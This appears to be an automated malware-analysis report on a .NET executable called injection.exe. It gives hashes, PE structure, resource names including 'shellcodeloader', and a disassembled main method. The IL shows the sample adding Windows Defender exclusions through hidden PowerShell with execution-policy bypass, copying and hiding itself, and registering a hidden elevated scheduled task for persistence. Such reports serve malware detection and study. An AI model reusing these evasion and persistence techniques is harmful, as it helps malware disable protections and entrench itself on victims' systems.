Suspicious
Suspect

0c6f9ab8c9e7d343f0ccae86803279c0

PE Executable | MD5: 0c6f9ab8c9e7d343f0ccae86803279c0 | Size: 667.65 KB | application/x-dosexec

Characteristics

Symbol Obfuscation Score: Low

Hashes
MD5: 0c6f9ab8c9e7d343f0ccae86803279c0
SHA1: fc2ca71cfcb1b5f514186c3a36700544026f597e
SHA256: 34815fc9badaa5b7ef9b8394a1aa00bbf98917382f565e9b782293f0e623b5a3
SHA384: d4a0a2729e8ce705b85cf0c662741c7027f57adfe47bf0c43a9dff84148e300ad0f54615bc4cdd136f9cb9459eb18f2d
SHA512: 89244210e500d416b638bfbe2925268fa784c2ba61aa80f39f5d856d55190db42179b9031964da998152c135b05e477050389b52b3439b0a35817a229b45049d
SSDeep: 12288:HVcZgJZnprs9k+gltkfj9kcpP2EOxl/f0VPW3mpM:maZnpq/aiNpP2EOxZmWEM
TLSH: 5FE4E11127E4892BEEAE13B4F5B0161027B4F54BA561EB8A78CC15FA9F6334059133BF
File Structure
Structure
DosHeader
PE Header
Optional Header (x86)
Section Headers
.text
.rsrc
.reloc
Resources
RT_VERSION
ID:0001
ID:0
RT_MANIFEST
ID:0001
ID:0
.Net Resources
x;0#&462;&72&;.Resources
shellcodeloader
Microsoft.Win32.TaskScheduler.Properties.Resources.resources
Microsoft.Win32.TaskScheduler.V1.TaskSchedulerV1Schema.xsd
Microsoft.Win32.TaskScheduler.TaskService.bmp
Information
Module Name: injection.exe
Full Name: injection.exe
EntryPoint: System.Void x&4&;x64x7::#7#x;&6&67()
Scope Name: injection.exe
Scope Type: ModuleDef
Kind: Windows
Runtime Version: v4.0.30319
Tables Header Version: 512
WinMD Version: <null>
Assembly Name: injection
Assembly Version: 1.0.0.0
Assembly Culture: <null>
Has PublicKey: False
PublicKey Token: <null>
Target Framework: <null>
Total Strings: 534
Main Method: System.Void x&4&;x64x7::#7#x;&6&67()
Main IL Instruction Count: 204

Main IL

call System.Boolean x&4&;x64x7::66##2;;x26() brtrue IL_0010: ldsfld System.String 64;;;;&#6;::#&;267x&;& ldc.i4.0 <null> call System.Void System.Environment::Exit(System.Int32) ldsfld System.String 64;;;;&#6;::#&;267x&;& ldsfld System.String 64;;;;&#6;::126#46;676 ldstr \ ldsfld System.String 64;;;;&#6;::6x62#x##;; call System.String System.String::Concat(System.String,System.String,System.String) ldc.i4.0 <null> call System.Int32 Microsoft.VisualBasic.CompilerServices.Operators::CompareString(System.String,System.String,System.Boolean) ldc.i4.0 <null> bne.un IL_0096: call System.Boolean x&4&;x64x7::#x;##x;;a4() ldsfld System.Collections.Generic.List`1<System.String> 64;;;;&#6;::662#&4;&#& callvirt System.Collections.Generic.List`1/Enumerator<System.String> System.Collections.Generic.List`1<System.String>::GetEnumerator() stloc.0 <null> br IL_0070: ldloca.s V_0 ldloca.s V_0 call System.String System.Collections.Generic.List`1/Enumerator<System.String>::get_Current() stloc.1 <null> ldnull <null> ldftn System.Void x&4&;x64x7::6#;x&a4&3#(System.Object) newobj System.Void System.Threading.ParameterizedThreadStart::.ctor(System.Object,System.IntPtr) newobj System.Void System.Threading.Thread::.ctor(System.Threading.ParameterizedThreadStart) stloc.2 <null> ldloc.2 <null> ldloc.1 <null> call System.String Microsoft.VisualBasic.CompilerServices.Conversions::ToString(System.Object) call System.Byte[] x&4&;x64x7::#07a4661#7(System.String) callvirt System.Void System.Threading.Thread::Start(System.Object) ldloca.s V_0 call System.Boolean System.Collections.Generic.List`1/Enumerator<System.String>::MoveNext() brtrue.s IL_0045: ldloca.s V_0 leave IL_008C: call System.Void System.Windows.Forms.Application::Run() ldloca.s V_0 constrained. 
System.Collections.Generic.List`1/Enumerator<System.String> callvirt System.Void System.IDisposable::Dispose() endfinally <null> call System.Void System.Windows.Forms.Application::Run() br IL_0312: ret call System.Boolean x&4&;x64x7::#x;##x;;a4() brtrue IL_00B6: call System.Boolean x&4&;x64x7::#x;##x;;a4() ldsfld System.String 64;;;;&#6;::#&;267x&;& call System.Boolean x&4&;x64x7::2#66#;4&&#(System.String) pop <null> call System.Void x&4&;x64x7::##422&;;76() ldc.i4.0 <null> call System.Void System.Environment::Exit(System.Int32) call System.Boolean x&4&;x64x7::#x;##x;;a4() brfalse IL_014D: ldsfld System.String 64;;;;&#6;::126#46;676 newobj System.Void System.Diagnostics.ProcessStartInfo::.ctor() stloc.3 <null> ldloc.3 <null> ldstr powershell.exe callvirt System.Void System.Diagnostics.ProcessStartInfo::set_FileName(System.String) ldloc.3 <null> ldc.i4.1 <null> callvirt System.Void System.Diagnostics.ProcessStartInfo::set_WindowStyle(System.Diagnostics.ProcessWindowStyle) ldloc.3 <null> ldstr -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath ' ldsfld System.String 64;;;;&#6;::126#46;676 ldstr \ ldsfld System.String 64;;;;&#6;::6x62#x##;; call System.String System.String::Concat(System.String,System.String,System.String) call System.String System.IO.Path::GetFullPath(System.String) ldstr ' call System.String System.String::Concat(System.String,System.String,System.String) callvirt System.Void System.Diagnostics.ProcessStartInfo::set_Arguments(System.String) ldloc.3 <null> call System.Diagnostics.Process System.Diagnostics.Process::Start(System.Diagnostics.ProcessStartInfo) callvirt System.Void System.Diagnostics.Process::WaitForExit() ldloc.3 <null> ldstr -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess ' ldsfld System.String 64;;;;&#6;::6x62#x##;; ldstr ' call System.String System.String::Concat(System.String,System.String,System.String) callvirt System.Void System.Diagnostics.ProcessStartInfo::set_Arguments(System.String) ldloc.3 <null> call 
System.Diagnostics.Process System.Diagnostics.Process::Start(System.Diagnostics.ProcessStartInfo) callvirt System.Void System.Diagnostics.Process::WaitForExit() leave IL_014D: ldsfld System.String 64;;;;&#6;::126#46;676 dup <null> call System.Void Microsoft.VisualBasic.CompilerServices.ProjectData::SetProjectError(System.Exception) stloc.s V_4 call System.Void Microsoft.VisualBasic.CompilerServices.ProjectData::ClearProjectError() leave IL_014D: ldsfld System.String 64;;;;&#6;::126#46;676 ldsfld System.String 64;;;;&#6;::126#46;676 ldstr \ ldsfld System.String 64;;;;&#6;::6x62#x##;; call System.String System.String::Concat(System.String,System.String,System.String) call System.Boolean System.IO.File::Exists(System.String) brfalse IL_0199: ldc.i4 1000 ldsfld System.String 64;;;;&#6;::126#46;676 ldstr \ ldsfld System.String 64;;;;&#6;::6x62#x##;; call System.String System.String::Concat(System.String,System.String,System.String) newobj System.Void System.IO.FileInfo::.ctor(System.String) stloc.s V_5 ldloc.s V_5 ldc.i4 128 callvirt System.Void System.IO.FileSystemInfo::set_Attributes(System.IO.FileAttributes) ldloc.s V_5 callvirt System.Void System.IO.FileInfo::Delete() ldc.i4 1000 call System.Void System.Threading.Thread::Sleep(System.Int32) ldsfld System.String 64;;;;&#6;::126#46;676 ldstr \ ldsfld System.String 64;;;;&#6;::6x62#x##;; call System.String System.String::Concat(System.String,System.String,System.String) ldsfld System.String 64;;;;&#6;::#&;267x&;& call System.Byte[] System.IO.File::ReadAllBytes(System.String) call System.Void System.IO.File::WriteAllBytes(System.String,System.Byte[]) leave IL_01DD: ldsfld System.String 64;;;;&#6;::126#46;676 dup <null> call System.Void Microsoft.VisualBasic.CompilerServices.ProjectData::SetProjectError(System.Exception) stloc.s V_6 call System.Void Microsoft.VisualBasic.CompilerServices.ProjectData::ClearProjectError() leave IL_01DD: ldsfld System.String 64;;;;&#6;::126#46;676 ldsfld System.String 64;;;;&#6;::126#46;676 
ldstr \ ldsfld System.String 64;;;;&#6;::6x62#x##;; call System.String System.String::Concat(System.String,System.String,System.String) ldc.i4.6 <null> call System.Void System.IO.File::SetAttributes(System.String,System.IO.FileAttributes) leave IL_020E: newobj System.Void Microsoft.Win32.TaskScheduler.TaskService::.ctor() dup <null> call System.Void Microsoft.VisualBasic.CompilerServices.ProjectData::SetProjectError(System.Exception) stloc.s V_7 call System.Void Microsoft.VisualBasic.CompilerServices.ProjectData::ClearProjectError() leave IL_020E: newobj System.Void Microsoft.Win32.TaskScheduler.TaskService::.ctor() newobj System.Void Microsoft.Win32.TaskScheduler.TaskService::.ctor() stloc.s V_8 ldloc.s V_8 callvirt Microsoft.Win32.TaskScheduler.TaskDefinition Microsoft.Win32.TaskScheduler.TaskService::NewTask() stloc.s V_9 newobj System.Void Microsoft.Win32.TaskScheduler.TimeTrigger::.ctor() stloc.s V_10 ldloc.s V_10 callvirt Microsoft.Win32.TaskScheduler.RepetitionPattern Microsoft.Win32.TaskScheduler.Trigger::get_Repetition() ldc.r8 1 call System.TimeSpan System.TimeSpan::FromMinutes(System.Double) callvirt System.Void Microsoft.Win32.TaskScheduler.RepetitionPattern::set_Interval(System.TimeSpan) ldloc.s V_9 callvirt Microsoft.Win32.TaskScheduler.TriggerCollection Microsoft.Win32.TaskScheduler.TaskDefinition::get_Triggers() ldloc.s V_10 callvirt Microsoft.Win32.TaskScheduler.Trigger Microsoft.Win32.TaskScheduler.TriggerCollection::Add(Microsoft.Win32.TaskScheduler.Trigger) pop <null> call System.Boolean x&4&;x64x7::#x;##x;;a4() brfalse IL_0265: ldloc.s V_9 ldloc.s V_9 callvirt Microsoft.Win32.TaskScheduler.TaskPrincipal Microsoft.Win32.TaskScheduler.TaskDefinition::get_Principal() ldc.i4.1 <null> callvirt System.Void Microsoft.Win32.TaskScheduler.TaskPrincipal::set_RunLevel(Microsoft.Win32.TaskScheduler.TaskRunLevel) ldloc.s V_9 callvirt Microsoft.Win32.TaskScheduler.TaskSettings Microsoft.Win32.TaskScheduler.TaskDefinition::get_Settings() ldc.i4.1 <null> 
callvirt System.Void Microsoft.Win32.TaskScheduler.TaskSettings::set_Hidden(System.Boolean) ldloc.s V_9 callvirt Microsoft.Win32.TaskScheduler.ActionCollection Microsoft.Win32.TaskScheduler.TaskDefinition::get_Actions() ldsfld System.String 64;;;;&#6;::126#46;676 ldstr \ ldsfld System.String 64;;;;&#6;::6x62#x##;; call System.String System.String::Concat(System.String,System.String,System.String) ldnull <null> ldnull <null> newobj System.Void Microsoft.Win32.TaskScheduler.ExecAction::.ctor(System.String,System.String,System.String) callvirt Microsoft.Win32.TaskScheduler.Action Microsoft.Win32.TaskScheduler.ActionCollection::Add(Microsoft.Win32.TaskScheduler.Action) pop <null> ldloc.s V_8 callvirt Microsoft.Win32.TaskScheduler.TaskFolder Microsoft.Win32.TaskScheduler.TaskService::get_RootFolder() ldsfld System.String 64;;;;&#6;::#x42;xx26& ldloc.s V_9 callvirt Microsoft.Win32.TaskScheduler.Task Microsoft.Win32.TaskScheduler.TaskFolder::RegisterTaskDefinition(System.String,Microsoft.Win32.TaskScheduler.TaskDefinition) pop <null> ldc.i4 3000 call System.Void System.Threading.Thread::Sleep(System.Int32) call System.Void x&4&;x64x7::##422&;;76() ldloc.s V_8 ldsfld System.String 64;;;;&#6;::#x42;xx26& ldc.i4.1 <null> callvirt Microsoft.Win32.TaskScheduler.Task Microsoft.Win32.TaskScheduler.TaskService::FindTask(System.String,System.Boolean) stloc.s V_11 ldloc.s V_11 brfalse IL_02E1: ldc.i4.0 ldloc.s V_11 ldc.i4.0 <null> newarr System.String callvirt Microsoft.Win32.TaskScheduler.RunningTask Microsoft.Win32.TaskScheduler.Task::Run(System.String[]) pop <null> ldc.i4.0 <null> call System.Void System.Environment::Exit(System.Int32) leave IL_02FB: leave IL_0312 ldloc.s V_8 brfalse IL_02FA: endfinally ldloc.s V_8 callvirt System.Void System.IDisposable::Dispose() endfinally <null> leave IL_0312: ret dup <null> call System.Void Microsoft.VisualBasic.CompilerServices.ProjectData::SetProjectError(System.Exception) stloc.s V_12 call System.Void 
Microsoft.VisualBasic.CompilerServices.ProjectData::ClearProjectError() leave IL_0312: ret ret <null>

Characteristics
No malware configuration was found at this point.